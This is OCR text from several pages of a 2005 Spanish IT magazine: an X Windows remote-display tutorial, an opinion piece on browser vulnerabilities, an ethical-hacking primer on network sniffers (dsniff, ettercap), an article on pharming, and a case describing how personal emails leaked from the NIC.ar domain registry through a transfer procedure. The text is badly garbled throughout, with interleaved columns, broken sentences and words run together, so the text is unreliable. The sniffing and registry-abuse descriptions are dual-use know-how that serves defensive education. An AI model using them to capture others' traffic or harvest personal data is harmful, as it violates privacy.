tipo gráfico se hicieron disponibles para usuarios finales,
vía el rápido escalado en la velocidad de las computado-
ras personales. Apple con su Mac, Sun con OpenWindows,
e IBM, confiando en Windows y OS/2, hicieron que el de-
sarrollo de interfaces de usuario rápidas e intuitivas se
disparara de manera astronómica.

Foto: © 2005 Hemera Technologies Inc.


LINUX

Arrancandoelentornográfico net, editar un documento más o menos com-


plejo (como éste, por ejemplo), o modificar una
Tenemos dos modos de arrancar el servidor de imagen. En este caso, arrancar el entorno
X Windows y su(s) clientes(s) en Linux. El gráfico pasa por escribir en la línea de coman-
primero,más actual y preferido por los newbies, dos # startx lo cual hará varias cosas.
es hacer que nuestro Linux arranque en modo Primeramente, arrancará el servidor X. Esto
gráfico directamente, cambiando en el archivo también puede hacerse vía el script xinit, locali-
/etc/inittab la línea que reza id:3:initde- zado por lo general en /usr/bin/X11. Ahora
Naceunaestrella fault: El número (tres, en este caso) indica el bien, xinit sólo arrancará el servidor, no algún
runlevel en el que nuestra máquina arrancará. cliente,por lo que no podremos interactuar con
Así, aparecieron diversas maneras de presentar El nivel de arranque tres levanta las conexiones la máquina.Como el procedimiento para arran-
esta interfaz de usuario,pero todas ellas con de- de red, los servidores que tengamos configura- car un cliente no es obvio,es preferible arrancar
nominador común: X Windows. Básicamente, X dos, y nos deja una interfaz de usuario en modo el server (y el cliente en forma subsecuente)
Widows es un sistema de ventanas indepen- texto. Para forzar el arranque en modo gráfico, mediante el script startx.
diente del hardware, y listo para trabajar en deberemos, mediante un editor de texto (Vim, Como ya hemos dicho, este script arrancará el
forma remota, o sea vía la red. Fue desarrollado Nedit, Midnight Commander, Pico, o su preferi- servidor X, pero además, buscará en nuestro
en el MIT, y si bien no es un producto disponible do), cambiar este número tres por un cinco, home un archivo llamado .xinitrc. El mismo
de forma pública, su código fuente está salvar el archivo, y reiniciar, o alternativamente, contiene comandos como qué manejador de
disponible de forma gratuita, prácticamente escribir en la línea de comandos # init 5 con ventanas arrancar, atajos de teclado, etc. Si este
para toda arquitectura de mainframe, estación lo cual, se arrancará el desktop manager, por lo archivo no existe, se arranca el entrono gráfico
de trabajo o computadora de escritorio. general, kdm o gdm. con una configuración por defecto, tomada de
Cada sisema X Windows tiene dos compo- La otra forma es con el clásico comando /usr/lib/X11/xinit/xinitrc.
nentes principales: un servidor, y uno o más "startx", un script que se encargará de setear En cambio, si estamos corriendo una terminal
clientes. Este paradigma fue introducido en el variables de entorno, poner el escritorio co- X, el servidor X corre continuamente. Al
momento de su creación para permitir montar rrecto, la resolución, configurar varios clientes loguearnos, el sistema busca un archivo per-
estaciones de trabajo o terminales poco po- X, etc. Veamos ahora someramente cómo sonalizado de configuración, donde figura el
tentes, mientras que el manejo del trabajo de arranca un X server… tipo de manejador de ventanas que preferi-
entrada/salida era manejado por un mainframe mos, etc. Dicho archivo se llama ~/.xsession
lo suficientemente potente como para soportar ElXSer ver:quiénmeescucha
a varios clientes accediendo a la vez. El servidor LosclientesX
yquiénmeve…
es el encargado de realizar todo el trabajo de in-
terfaz, manejando la entrada vía teclado, El objetivo principal de los clientes X es enviar
Ahora bien, muchos de nosotros no podemos
mouse, etc, y la salida, vía el monitor. Es impor- información de entrada a las aplicaciones co-
aún resistirnos al encanto de las 25 líneas por
tante notar aquí que el cliente no accede direc- rriendo en el server, por medio de la lectura del
80 columnas, por lo que optamos por mante-
tamente a los periféricos de entrada/salida,sino teclado y el ratón. Este último no sólo envía
ner el login en forma de texto, y arrancar X
que lo hace a través del servidor. señales vía sus botones,sino que además selec-
Windows cuando deseamos navegar por inter-
Normalmente, en nuestros *NIX o LINUXes, co-
rremos el cliente y el servidor en la misma
máquina, pero, dado que X Windows es un
sistema listo para correr en redes, es posible
correr el servidor en una computadora, y uno o
más clientes en otras distintas. Normalmente,
la comunicación entre ambas partes se realiza
vía TCP/IP, pero es posible enlazar ambos com-
ponentes por otros protocolos, lo que abre la
puerta, por ejemplo, a correr un cliente en una
computadora remota, enlazada mediante un
MODEM y un teléfono celular, por ejemplo…
Aún recuerdo mis inicios con la interfaces grá-
ficas, diez años atrás. SuSe 4.2 era la distro, y
KDE 1.1 el manejador de ventanas… Arrancar
esta combinación en un Pentium 133 significa-
ba escribir "startx" en la línea de comandos,
irse a calentar el agua para el mate, ver el disco
rígido pelearse contra los pedidos de swap del
sistema operativo… Cinco minutos más tarde,
tenía un escueto, poco estable, pero magnífico
y potente (cuando andaba) escritorio donde
trabajar. Eso sí, con paciencia al abrir las aplica-
ciones, por favor…

Revista de Networking y Programación / NEX - 53|


Primero, logueémonos en "Chica", y desde su
entorno gráfico, abramos dos terminales.
En la primera de ellas, hagamos un login
remoto a "Grande", vía SSH, Telnet, o Rlogin,
según nos convenga. [yo@chica ~] $ssh
grande -C -l yo yo@grande´s password:
En la terminal que está en "Chica", escribamos
[yo@chica ~]$ xhost + O bien [yo@chica
~]$ xhost +grande para permitirle a Grande
escribir en la pantalla de Chica.
En la consola abierta remotamente en
"grande",escribamos: [yo@grande ~]$ setenv
DISPLAY chica:0 Con esto estamos redirec-
cionando la salida del servidor X de Grande a la
pantalla de Chica. (acá, asumo que su shell por
defecto es cshell)
Desde la consola remota en Grande, es-
cibamos: [yo@grande ~]$ xmaple Y ya está, la
salida debería aparecer en la pantalla de Chica,
permitiéndonos usar el ratón y el teclado para
entrar datos.
Bien, nuestro server sabe que queremos que
escriba sus datos y lea su entrada de nuestro
ciona qué aplicación (o cliente X) se comunica para máquinas "chicas" es IceWM. Potente y host remoto. ¡Pero el problema es que nuestro
con el server, al posicionarnos sobre él. Como simple,tiene la capacidad de importar los menús host remoto no permite por defecto que
ya hemos explicado, cada aplicación que corre disponibles en KDE y/o GNOME, y significa cualquiera escriba en su pantalla, o lea de ella!
bajo X Windows es considerada un cliente X. mucho menos stress para el procesador y la Tremendo agujero de seguridad tendríamos si
Los ejemplos más comunes incluyen: placa de video. Inclusive, posee una versión las cosas fueran así…
" Xterm, el cliente de terminal, "light", más liviana aún, en caso de que no pre- Por esto, tenemos que darle una forma de au-
" Xedit, un editor de texto, cisemos compatibilidad con GNOME/KDE. tenticar quién puede y quién no hacer lo antedi-
" Xclock, el reloj de X Windows, Un párrafo aparte merece GNOME. Todos los cho. La mayoría de los X Servers soportan dos
" El Manejador de Ventanas. entornos de escritorio arriba mencionados formas de autenticación de conexiones: el
poseen su propio Manejador de Ventanas, pero mecanismo de lista de hosts (xhost), y el meca-
ElManejadordeVentanas no así GNOME. Sus desarrolladores han preferi- nismo de las magic cookies (xauth). Así es como
do publicar una serie de especificaciones que SSH, puede hacer forward de conexiones X.
El Manejador de Ventanas (o Window Manager, convierten a un WM en "GNOME-compatible".
o WM a secas) es un cliente X muy especial. Es Ningún WM es 100% GNOME-compatible en Xhost
el que nos permite agrupar las ventanas, este momento, aunque Enlightment se en-
moverlas, cambiar su tamaño, matarlas, o mini- cuentra casi en ese status. Otros que lo siguen Xhost hace autenticación basada en el nombre
mizarlas. Provee además de una barra donde de cerca son IceWM,WindowMaker y BlackBox. del host que quiere conectarse. También,
agrupar las ventanas, varios menús desple- permite que cualquiera se conecte a nuestro X
gables, y otras utilidades. Como ya hemos Funcionamientoremoto: Server (¡cuidado! ¡Esto significa que no realiza
dicho, hay un gran número de WMs XclientsyXser verscorriendo NINGÚN chequeo de autenticación!). Para
disponibles, en función de nuestros gustos y de enmáquinasseparadas manejar la lista de hosts que pueden conec-
la potencia de la computadora, podremos tarse a nuestro display, se trabaja con los modi-
elegir uno con el que nos sintamos más Ya lo hemos explicitado, pero para comenzar ficadores + y - del comando xhost, como vimos
cómodos. Encima del Window Manager, debe- esta sección, no viene mal recordarlo: X es un en el ejemplo del principio: [yo@chica ~]$
remos colocar un entorno de escritorio. sistema de ventanas orientado a redes. Esto es, xhost + (que deshabilita el chequeo) O
Últimamente, los entornos de escritorio más uti- soporta la capacidad de correr el servidor y bien[yo@chica ~]$ xhost +grande que sólo
lizados incluyen KDE y GNOME,pero XFCE se está lo(s) clientes(s) en máquinas separadas. Esto habilita a Grande a escribir en nuestro display.
consolidando como una buena alternativa a nos da una cierta ventaja cuando el servidor
ambos, fiable, elástica, y mucho más liviana que corre en una máquina significativamente más Si deseamos eliminar un host de la lista de los
las anteriores. En los primeros tiempos, los es- potente que la que corre el cliente, o si la que pueden escribir a nuestro display, escribi-
critorios disponibles eran clones de aplicaciones máquina local es simplemente una terminal X, mos [yo@chica ~]$ xhost -grande
como OpenWindows de Sun (el viejo y conocido y no es capaz de correr clientes locales. ¡Atención! Si escribimos [yo@chica ~]$
OLWM),el Common Desktop Environment (CDE), Como ejemplo simple, pensemos que quere- xhost- no estaremos eliminando todos los
un entorno de escritorio basado en Motif, o mos correr el paquete "xmaple" en la hosts de la lista de autenticación, sino rehabili-
4DWM, el WM de SGI, TWM, un Manejador de máquina "Grande", pero actualmente tando el chequeo de hosts simplemente.
Ventanas de tipo "tab". Otra buena alternativa estamos sentados en "Chica". Xhost es un mecanismo extremadamente inse-

|54 - NEX / Revista de Networking y Programación


guro. NO distingue entre nombre de usuario jarlas, pero al que le interese saber más, le re-
que vengan de un mismo host, y además, los comiendo el Remote X Apps mini-HOWTO, de
nombres de host son fácilmente falseables Vincent Zweije.
(spoofing). Esto es malo si se encuentra en una
red insegura (como sobre PPP). Conclusiones

Xauth La idea que perseguí al encarar este artículo


era familiarizarlos con el uso y los rudimentos
El principio de Xauth es simple: dejar pasar a de configuración del entorno gráfico, y con las
todo aquel que conozca el secreto correcto ;-). facilidades que brinda. Muchos de nosotros
Este esquema de autenticación es conocido pensamos a X Windows como una ventajosa
como MIT-MAGIC-COOKIE. interfaz gráfica, pero es más que eso. Existen
Las cookies para distintos displays se guardan clientes X capaces de correr sobre otros sis-
en ~/.Xauhority. Este archivo debería ser inacce- temas operativos, como Windows o MacOS, lo
sible para otros grupos/usuarios. Al arrancar un que nos da la ventaja de exportar nuestro es-
sesión, el Server lee una cookie del archivo es- critorio a otro entorno de trabajo (prometo un
pecificado mediante el switch -auth. Luego de artículo sobre esto!).Tenemos las posibilidades
eso, el server sólo permite conexiones de los de replicar nuestro escritorio en más de una
clientes que conocen esa cookie. Si el valor de la pantalla, lo que se convierte en una magnífica
cookie cambia,el server no verá esos cambios… herramienta a la hora de dar clases… y la lista
Los servers más nuevos pueden generar las sigue y sigue…
cookies on the run, y las guardan dentro de X Windows significó una revolución en los `80,
ellos, a menos que un cliente les pida escribir- y aún hoy continúa evolucionando, volvién-
las en el archivo ~/.Xauhority. dose más potente, portable, y configurable.
Como se ve, xauth representa una alternativa Espero que les haya picado el gusanito, y que
mucho más segura a xhost. Se puede limitar el traten de comprenderlo mejor.
acceso a determinados usuarios en determi-
nadas computadoras, sin importar si estos
cambian su nombre de usuario o host. Mejor
aún, su uso no deshabilita el de xhost.
Podríamos explayarnos acerca de otros usos de
las conexiones remotas de X Servers, como en
el caso de los Thin Clients, o las terminales X, Nuestros suscriptores pueden bajarse de
pero eso sería ir más allá del objetivo de éste www.nexweb.com.ar una versión extendida de
artículo. Existen maneras de generar las magic este artículo de Luis Otegui.Contiene scripts de
cookies,transportarlas a otra máquina,y mane- configuración muy completos. Imperdible...
OPINION

Dimecuantosteusan...
...ytediréquiénesteatacan
Unacaracterísticadelamayorpartededelos
programas desarrollados en comunidad, ya
seansoftwarelibreocódigoabierto,esqueson
naturalmente más seguros y suelen estar más
limpiosdefallas.Peroesonoloseximedeser
atacados,comocualquierhijodevecino.

M
ás de una vez hemos discutido con la gente world.com/securitytopics/security/story/0,10801,10054 Ricardo D. Goldberger
del ambiente de software libre y del código 1,00.html), en el que demuestra que los browsers de Periodista científico especial-
abierto y también de la industria propietaria, Mozilla.org (Mozilla y Firefox, principalmente) están izado en Informática y Nuevas
las razones por las cuales aparecen las distin- siendo, cada vez más, blanco de los ataques. Tecnologías. Produce el
tas vulnerabilidades en las diferentes aplicaciones. Algunos de los datos del informe indican que entre julio newsletter electrónico T-knos,
Una de las cosas que a veces no se remarca lo suficiente, y diciembre de 2004 se documentaron 21 vulnerabili- conduce "El Explorador
Federal" por AM Radio El
es que casi el 90% de esas vulnerabilidades son encon- dades que afectan a la familia de Mozillas, contra 13 que
Mundo y colabora en Gillespi
tradas por gente que va a buscarlas específicamente. afectan al Internet Explorer. O sea, por primera vez en su Hotel, en FM Rock & Pop.
Dicho de otra manera, lo que habitualmente suele ser un historia, los browsers libres pasaron al frente de la lista
error de programación, en la mayor parte de los casos in- de debilidades. La buena noticia es que, en cambio, pro-
voluntario (aún cuando no se descarta cierto grado de porcionalmente, la vulnerabilidades de Internet Explorer
negligencia), sólo se encuentra porque hay grupos de in- son más críticas que las de Firefox: 9 de 13 para Internet
dividuos especialmente dedicados a buscarlas. Explorer contra 11 de 21 para Firefox. Además, la vulner-
Más de una vez hemos dicho, también, que el hacker, hoy abilidades de Internet Explorer han tardado más en ser
en día, ya no es ese adolescente sucio, desprolijo, rodeado corregidas (43 días) que las de los Mozilla (26 días).
de cajas vacías de pizza, con ansias de figurar. Hoy en día Alfred Huger,el director de ingeniería de Symantec,afirmó,
son señores profesionales (que incluso trabajan en muy suelto de cuerpo,que "estamos empezando a ver que
equipo) y cuya tarea, cada vez más, tiene un fin eminen- Firefox y Mozilla están atrayendo más la atención de los a-
temente lucrativo.Puede ser tanto conseguir una base de tacantes, y seguramente va a continuar así…" Y concluyó
datos como bloquear las transacciones de un sitio web, contundente: "La gente que escribe troyanos y gusanos
tanto robar identidades para cometer fraudes y estafas para ser distribuidos a través de la vulnerabilidades de los
como realizar espionaje industrial. browsers, están buscando el máximo rendimiento". Por
Es más, estos distintos grupos compiten entre sí e, supuesto, como máximo rendimiento, léase máximo daño
incluso, terminan guerreando entre ellos, como el caso de Este estudio contiene más cifras de las que comentamos,
los grupos rusos A 29 y Skynet, que incluyen entre sus varias de las cuales son, por lo menos, preocupantes.
códigos maliciosos instrucciones para desactivar o elimi- Pero lo que más me interesa destacar en esta nota, es
nar código de la competencia. que aquello que sosteníamos de que los sistemas opera-
La conclusión de esto es que los ataques y la búsqueda de tivos y las aplicaciones libres serían igualmente atacadas
vulnerabilidades ya no van tan dirigidas a ciertos sistemas que las otras, el día de que sean lo suficientemente po-
operativos específicos, o a atacar a la calidad de los pro- pulares, no era una conspiración contra el software libre
ductos de una determinada compañía, sino que per- o el código abierto, o una campaña de FUD (Fear,
siguen objetivos definidos, independientemente de las Uncertainty and Doubt) sino una hipótesis que está
aplicaciones y plataformas a las que deban asaltar. comenzando a confirmarse.
Precisamente, una de las razones por las cuales los Para ser honestos, a esta altura de la soireé, importa poco
hackers están a la pesca de vulnerabilidades en ciertos y si las vulnerabilidades están en un Windows, en un Linux,
determinados programas, es su popularidad: de nada en un Firefox,o en un MS Office… cuántas más haya,más
vale atacar uno que no conoce nadie, o que no usa nadie, demanda de software de seguridad va a haber. Por
especialmente en el ámbito corporativo. Es más, la clave supuesto, de ahí no se puede inferir que las empresas
no sólo es la popularidad sino la calidad de la informa- productoras de software de seguridad sean responsables
ción que se transmite a través de esas aplicaciones. de las vulnerabilidades.
La consecuencia directa de esto es que, a medida que Pero una cosa sí es cierta: si bien por diseño mucho del
los programas alternativos a los propietarios se software libre y del código abierto es más seguro, deja
vuelvan cada vez más populares, serán, cada vez más, menos flancos descubiertos, y es un poco más inmune
blanco de los ataques. que otro tipo de software, lo cierto es que no es total-
Una demostración de que esto es cada vez más así, es un mente vulnerable.Y eso es lo que los diseñadores de este
informe que publicó Symantec y que Jaikumar Vijayan tipo de programas deberían tener en cuenta a la hora de
analizó para Computerworld (http://www.computer- sentarse a descansar en sus laureles.

Revista de Networking y Programación / NEX - 57|


ETHICAL

HACKING VoL.3
Imágen: © 2005 Hemera Technologies Inc.

Sniffers 60
Pharming 62
Casonic.ar 64
ComunicacionesSeguras 68
HackingUnixPaso7 76
Netcat,lanavajasuiza 78

/ NEX - 59|
ETHICAL HACKING - FUNDAMENTOS

¿Quéesunsniffer?

Un sniffer es un programa/dispositivo que con-


trola el tráfico de la red y captura la informa-
ción que se transmita por ella.Sniffers son bási-

Foto: © 2005 Hemera Technologies Inc.


camente programas para interceptar datos.
Trabajan basándose en que el tráfico ethernet
fue diseñado para compartir.
La mayoría de las redes usan tecnología de
broadcast, es decir que cada mensaje transmi-
tido por un equipo en una red va a ser leído por
todos los equipos de una red. En la práctica,
todos los equipos de la red, excepto el que
debía recibir el mensaje van a ignorar el
mensaje porque no le corresponde.
Igualmente, uno puede lograr que nuestro Si bien parece una pregunta ridícula, mucha ¿QuéesunaMACaddress?
equipo acepte esos mensajes aunque no sean gente suele hacer este tipo de preguntas. NO,
para él usando un sniffer. es la respuesta. La conectividad que hay en Muchos equipos pueden llegar a compartir una
Internet es como una red, el tráfico camina por red. Cada equipo debe tener una identificación
¿Paraqué esa red y no hay un punto en el cual se puedan única para poder distinguirse entre ellos. Esto no
puedousarunsniffer? ver todos los orígenes y destinos. De la misma pasa con conexiones dial-up donde uno habla
forma, Internet soporta que haya "puntos de únicamente con el otro lado de la línea telefónica.
En internet se consiguen herramientas para falla" y que todos sigamos conectados. De la Pero cuando enviamos tráfico al cable de red
hacer sniffing., tanto free como no free, Estas misma forma, previene el sniffing. tenemos que dejar en claro para quien es el
aplicaciones sirven para: mensaje que estamos enviando.Para cumplir con
¿Cómotrabajaunsniffer? esto, cada equipo ethernet tiene un identificador
- Automáticamente conseguir usuarios y pass- único llamado mac address. Con el comando if-
words de una red en protocolos que trans- Supongamos que una pcA quiere hablar con config podemos ver la dirección mac de nuestra
miten en texto plano, como el telnet y el pop3. una pcB. pcA tiene una dirección de red placa de red (Fig. 1).Donde la mac address es el
- Convertir el tráfico a "human readable" así se 192.168.0.200 y pcB tiene una dirección de red número hexadecimal 52:54:05:F3:95:01.
puede interpretar el contenido. 192.168.0.201. Cuando pcA le envía un
- Analizar problemas de tráfico de red, como paquete a la red incluye como contenido la di- ¿Cómodetectarunsniffer?
problemas de latencia o equipos que "no se rección mac del destino y del origen. Todos los
ven" en la red. equipos de la red comparan la mac del destino Un sniffer es pasivo, sólo recolecta información.
- NIDS, como el snort. con su mac. Cuando no coincidan van a descar- Por lo tanto, es dificultoso detectar un sniffer
- Logueo de red,simplemente para tener una es- tar el paquete. El equipo que use un sniffer no en una red. A nivel local, en Linux podemos ver
tadística del tráfico de la red para futuro análisis. cumple con esta regla y no descarta el si una placa está o no en modo promiscuo con
paquete. Este tipo de equipos se dice que están solo mirar el output del comando ifconfig (fig.
¿Hay algún lugar donde pueda conectarme en modo promiscuo y efectivamente puede es- 2).En un equipo en modo promiscuo el resulta-
para ver el tráfico de todo internet? cuchar todo el tráfico de una red. do del ifconfig no es el mismo (Fig.3)

¿Quéherramientasexistenparamonitoreareltráficodenuestrared?Los
SINIFFERS (una traducción exacta para este contexto no es fácil pero
queda resumido por: olfatear, rastrear, husmear) hacen justamente eso:
capturanlainformacióndenuestraLAN.Conozcamosquéhacenycuáles
sonlosmásusadosdentrodelmundoOpenSource.

SNIFFERS
|60 - NEX / Revista de Networking y Programación
¿Cómoprevenirelsniffing? *Dsniff: Una herramienta utilizada para sniffe-ar una red y encontrar
tráfico en texto plano. Incluye varias aplicaciones para escuchar y crear
El mejor método es segurizando nuestra red usando métodos de en- tráfico de red.
criptación. Mientras que esto no va a prohibir que nadie nos registre el
tráfico, va a evitar que entiendan lo que capturen. *Snort: Es la herramienta a la hora de usar un NIDS y tener un control de
lo que esta pasando en nuestra LAN. Está discutida en detalle, corriendo
*SSH: El estandar para administración remota de equipos *nix o *bsd bajo Windows y bajo Linux, en NEX IT Specialist #13, pags 68 y 70, Marzo
es a través del Secure Shell. El SSH espera primero la validación de 2005, respectivamente
ambos equipos para pedir usuario y password, TODA la transferencia
es encriptada. Hay dos protocolos para este tipo de comunicaciones, *Ettercap: Si pensaban que tenían una red segura por usar un switch,
tengamos presente en estar usando la versión 2 y no la versión 1 que estan equivocados. El ettercap es una herramienta muy poderosa que
trae problemas similares a los que trae el telnet. Si bien es encripta- nos permite tomar el control total de una LAN.
do, es muy sencillo desencriptar..
*Kismet: Si tienen una placa wifi no pueden dejar de probar esta herra-
*VPN: Encriptar los datos en una Red Privada Virtual para transmitir mienta. Es la herramienta por excelencia a la hora de hacer sniffing en
datos seguros entre dos redes. Pero con una aclaración importante, redes inalámbricas. Puede emitir sonidos al descubrir una red e inclusive
obviamente si alguno de los nodos es comprometido con algún registrar la ubicación usando un gps.
troyano, el tráfico vuelve a estar comprometido. Hay varios niveles de
encriptación y tipos de VPN. Conclusión

*SSL: Secure Sockets Layer, SSL esta incluido en muchos servicios ac- Existen demasiadas herramientas que pueden perjudicar la seguridad en
tuales, como web, smtp, pop3. Es lo que se usa cuando se hace una trans- una red LAN. Confiemos o no en nuestros empleados, es imposible tener
misión web en modo seguro. Como cuando hacemos una compra con un control total de la situación. Lo ideal es tomar la mayor cantidad de
tarjeta de crédito por Internet o como cuando miramos los mails en medidas de seguridad posible, desde encriptar los mails hasta establecer
Hotmail.Una aclaración,NO cuando ingresamos el usuario y password en conexiones seguras via SSL. Pero para cualquiera sea el caso, es funda-
Hotmail, sólo cuando los leemos. mental conocer las herramientas que hay disponibles para conocer los
posibles ataques que nos podemos encontrar. Herramientas como el et-
*GNUPG: Los emails pueden ser sniffeados de muchas formas diferentes. tercap simplemente son inaceptables en una red lan y equipos en modo
Puede que ni siquiera hayan sido sniffeados, sino que fueron logueados promiscuo comprometen seriamente la privacidad de una LAN.
por un servidor corporativo que registra el tráfico.La mejor forma de ase-
gurar nuestro tráfico es encriptándolo con PGP (Pretty Good Privacy). eth0 Link encap:Ethernet HWaddr 52:54:05:F3:95:01
Para PGP existe la alternativa open source GNUPG. Podemos utilizar Fig. 1
gnupg en la mayoría de los clientes de correo open source.
eth0 Link encap:Ethernet HWaddr 52:54:05:F3:95:01
¿Quéaplicaciones inet addr:192.168.0.200 Bcast:203.199. ...
UP BROADCAST RUNNING MULTICAST MTU:1500 ...
haydisponiblesenLinux
parausardesniffer? Fig. 2

*Ethereal: Siendo una aplicación gráfica es una aplicación que tiene eth0 Link encap:Ethernet HWaddr 52:54:05:F3:95:01
muchos adeptos. Analiza el tráfico de una red y nos da la posibilidad de inet addr:192.168.0.200 Bcast:203.199. ...
usar filtros para buscar lo que queramos. Ideal para encontrar problemas UP BROADCAST RUNNING PROMISC MULTICAST ...
de red o protocolos. Fig. 3
ETHICAL HACKING - FUNDAMENTOS

PHARMING
Los hackers están intentando, cada vez más, obtener beneficios económicos de
susactuacionesydelmalwarequecrean.Sihastaahoraunodelosfraudesmás
Nueva técnica de fraude

PorFernandodelaCuadra
extendidoseraelphishing,consistenteenengañaralosusuariosparaqueefec- EditorTécnicoInternacional
túenope-racionesbancariasenser vidoreswebconelmismodiseñoqueunbanco PandaSoftware(http://www.pandasoftware.es/)
online,elpharmingentrañaaúnmayorespeligrosqueelphishing. E-mail:fdelacuadra@pandasoftware.es

B
Básicamente, el pharming consiste a su servicio bancario. De esta manera, el ata- debe ser, al menos en un primer frente de pro-
en la manipulación de la resolu- cante no debe estar pendiente de un ataque tección, una solución reactiva, sino que deben
ción de nombres en Internet, lle- puntual, como hemos mencionado antes. instalarse sistemas mediante los cuales se de-
vadas a cabo por algún código ma- La solución para esta nueva técnica de fraude tecten no los ficheros en función de firmas
licioso que se ha introducido en el equipo. pasa, de nuevo, por las soluciones de seguridad víricas, sino las acciones que se llevan a cabo en
Cuando un usuario teclea una dirección (como antivirus. Las acciones necesarias para llevar a el ordenador. De esta manera, cada vez que se
puede ser www.pandasoftware.com),ésta debe cabo el pharming necesitan efectuarse por intente realizar un ataque al sistema de DNS
ser convertida a una dirección IP numérica, alguna aplicación en el sistema a atacar (puede del ordenador (como es el caso de las aplica-
como 62.14.63.187. Esto es lo que se llama res- ser un fichero exe, un script, etc.). Pero antes de ciones para pharming), sea reconocido el
olución de nombres, y de ello se encargan los poder ejecutarse esta aplicación, debe llegar al ataque y detenido,así como el programa que lo
servidores DNS, siglas que corresponden a sistema objetivo, evidentemente. La entrada ha llevado a cabo, bloqueado.
"Domain Name Server". En ellos se almacenan del código en el sistema puede ser a través de Sin embargo, existe un peligro añadido a esta
tablas con las direcciones IP de cada nombre de múltiples vías, tantas como entradas de infor- nueva técnica de pharming, que reside en los
dominio. A una escala menor, en cada orde- mación hay en un sistema: el e-mail (la más fre- servidores proxies anónimos. Muchos usuarios
nador conectado a Internet hay un fichero en el cuente), descargas por Internet, copias desde desean ocultar su identidad (su dirección IP) a
que se almacena una pequeña tabla con un disco o CD, etc. En todas y cada una de estas la hora de navegar, por lo que utilizan servi-
nombres de servidores y direcciones IP, de entradas de información, el antivirus debe de- dores proxy instalados en Internet que llevan a
manera que no haga falta acceder a los DNS tectar el fichero con el código malicioso y eli- cabo la conexión con la IP del servidor en lugar
para determinados nombres de servidor, o minarlo, siempre que se encuentre detectado de la IP del cliente. En el peor de los casos, uno
incluso para evitarlo. como una aplicación dañina dentro del fichero de estos servidores proxy puede tener la reso-
El pharming consiste en modificar este sistema de firmas de virus del antivirus. lución de nombres alterada, de manera que los
de resolución de nombres, de manera que Desgraciadamente, hoy en día nos movemos usuarios que intenten entrar en su página ban-
cuando el usuario crea que está accediendo a en un escenario en el que el malware ha caria - a pesar de que su sistema local está per-
su banco en Internet, realmente está accedien- adquirido una velocidad de propagación muy fectamente asegurado- sean redirigidos por el
do a la IP de una página web falsa. elevada, y los creadores son más y ofrecen al proxy a una página con el mismo diseño y a-
El phishing debe su éxito a la ingeniería resto de la comunidad hacker los códigos pariencia de su banco, pero falsa. También po-
social, aunque no todos los usuarios caen en fuente para que introduzcan variaciones y dríamos pensar, siendo más positivos, que el
estos trucos y su éxito está limitado. Y puedan crear ataques nuevos. Los laborato- servidor proxy ha sufrido algún tipo de ataque
además, cada intento de phishing se debe rios de virus no tienen tiempo suficiente para que altere su sistema de resolución de

Foto: © 2005 Hemera Technologies Inc.


dirigir a un único tipo de servicio bancario, por efectuar la detección y eliminación del nombres de dominio. En cualquiera de los
lo que las posibilidades de éxito son muy li- malware para todos los nuevos códigos antes casos, el problema del pharming se plantea
mitadas. Por el contrario, el pharming puede de que lleguen a propagarse en unos pocos como peligroso, aunque de muy fácil solución.
atacar a un número de usuarios de banca PC. A pesar de los esfuerzos y la mejora de los Únicamente con sistemas capaces de detectar
muchísimo mayor. Además, el pharming no se laboratorios, es humanamente imposible que los cambios en la resolución de nombres de
lleva a cabo en un momento concreto, como se elabore una solución adecuada y a tiempo Internet en ordenador y con sistemas para su
lo hace el phishing mediante sus envíos, ya para algunos códigos que se propagan en bloqueo, podremos hacer frente a la avalancha
que la modificación de DNS queda en un or- cuestión de minutos. de códigos maliciosos que nos espera y que in-
denador, a la espera de que el usuario acceda La solución para este tipo de amenazas no tentan estafar a los usuarios.
ETHICAL HACKING - LEGALES

NIC.ar
caso

Acceso público a datos sensibles y sus posibles consecuencias.

L
a seguridad de la información tiene ción de los datos personales establecido por la
tantas aristas como las tiene el modo de Ley 25.326 y reglamentado por el Decreto Detallestécnicos
confeccionar un análisis de riesgo e im- 1558/2001, también conocido como "Habeas
plementar la totalidad de sus partes Data", basado en el derecho reconocido por el No se requerían demasiadas habilidades para
sobre un gran objetivo determinado, a veces art. 43 de la Constitución Nacional, permite que obtener los mails de las personas responsables
tantas, que algunos responsables en el trayecto los ciudadanos ejerzan un legítimo poder de de los sitios, ya en el año 2002 denuncié que
subestiman pequeños detalles. disposición y control sobre sus datos personales. podían solicitarse casi de la misma manera los
Principios de la seguridad informática: A tal fin,los faculta a decidir cuáles de esos datos mails de las entidades... en este caso solo
Disponibilidad, integridad y confidencialidad, quieren proporcionar a terceros, sea el Estado o bastaba con loguearse como una persona -
este ultimo componente delicado o sensible de un particular, o qué datos pueden esos terceros correo y dominio - y luego ir a a tramitar el
muchas empresas, corporaciones y personas recabar,permitiendo asimismo que sepan quién cambio de persona... por alguna persona de la
de nuestro país, ha estado expuesto desde el posee sus datos personales y para qué, pudien- que queriamos saber el mail.
lugar que pocos se imaginaban: nuestro sitio do inclusive oponerse a esa posesión o uso." Completandose este trámite,nos llegaba un mail
de registro Nic.ar para dominios nacionales, Nic.ar, aclara desde su sitio y más exactamente (como es costumbre) para reenviar a Nic.ar, que
.com.ar, .org.ar, net.ar .gov.ar y otros, a cargo de desde Preguntas Frecuentes, luego viendo la contenía la casilla de correo de la persona en
la Cancillería Nacional (Ministerio de relaciones seccion "De las Normas y procedimientos" dice cuestión...por supuesto que jamás seria reenvia-
exteriores, comercio internacional y culto) o en su punto numero 42: do, solo era con motivos de research de informa-
mas conocido como Network Information "Necesito comunicarme con una persona re- ción o toma de datos sensibles.
Center Argentina: Nic.ar. sponsable de un dominio ¿me podrían facilitar Hurgando algo más se podiaa saber a que
La filtración de datos sensibles, como en el caso su e-mail? Respuesta: NIC Argentina * no* pro- persona pertenecían determinados mails y si
que voy a detallar a continuación, no se da a porciona esta información a terceros." fuera por el casi anónimo sistema de envio de
través de su sistema operativo,no es posible de- Lamento decir que * si* proporcionó esa infor- Fax, no habría limites en cuanto a tramitación
tectar esta vulnerabilidad a través de un mación durante años hasta hace 4 dias, no solo fraudulenta.
scanner u otra herramienta de pen-test autom- dio a terceros el mail de las entidades respon- Lo que más llama la atención no es el sistema
atizada, sino burlando el sistema de registro y sables, sino tambien el de las personas respon- por demás de inseguro y obsoleto de trámites
consulta, basándose en la confianza - distrac- sables del dominio, violando asi tanto Habeas que libraba información sensible violando
ción, incapacidad u omisión - del analista o pro- Data, como todo a lo que referia en resguardo y normas de confidencialidad o Habeas Data,
gramador - que hace 10 años o más, diagramó confidencialidad de nuestros datos. sino el impacto que este sin fin de descuidos
